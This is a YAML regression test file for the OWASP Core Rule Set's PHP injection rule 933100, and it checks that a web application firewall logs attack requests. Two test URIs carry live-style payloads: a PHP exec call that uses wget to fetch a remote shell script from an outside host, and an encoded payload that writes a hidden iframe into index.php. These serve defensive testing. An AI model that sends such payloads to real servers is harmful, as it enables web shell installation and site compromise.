---
meta:
  author: csanders-git
  description: None
  enabled: true
  name: 933100.yaml
tests:
  - test_title: 933100-1
    desc: PHP Injection Attack (933100) from old modsec regressions
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
              Accept-Encoding: gzip,deflate
              Accept-Language: en-us,en;q=0.5
              Host: localhost
              Keep-Alive: '300'
              Proxy-Connection: keep-alive
              User-Agent: "OWASP CRS test agent"
            method: GET
            port: 80
            uri: /?foo=<?exec('wget%20http://r57.biz/r57.txt%20-O
            version: HTTP/1.0
          output:
            log_contains: id "933100"
  - test_title: 933100-2
    desc: PHP Injection Attack (933100) from old modsec regressions
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
              Accept-Encoding: gzip,deflate
              Accept-Language: en-us,en;q=0.5
              Host: localhost
              Keep-Alive: '300'
              Proxy-Connection: keep-alive
              User-Agent: "OWASP CRS test agent"
            method: GET
            port: 80
            uri: /?foo=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E
            version: HTTP/1.0
          output:
            log_contains: id "933100"
  - test_title: 933100-3
    desc: "PHP injection attack: looking for [/php] closing tag"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: "*/*"
              Host: "localhost"
              User-Agent: "OWASP CRS test agent"
            method: GET
            port: 80
            uri: /?foo=somePhpWouldGoHere%5B%2Fphp%5D
            version: HTTP/1.0
          output:
            log_contains: id "933100"
  - test_title: 933100-4
    desc: 'PHP injection attack: looking for [\php] closing tag'
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: "*/*"
              Host: "localhost"
              User-Agent: "OWASP CRS test agent"
            method: GET
            port: 80
            uri: /?foo=somePhpWouldGoHere%5B%5Cphp%5D
            version: HTTP/1.0
          output:
            log_contains: id "933100"
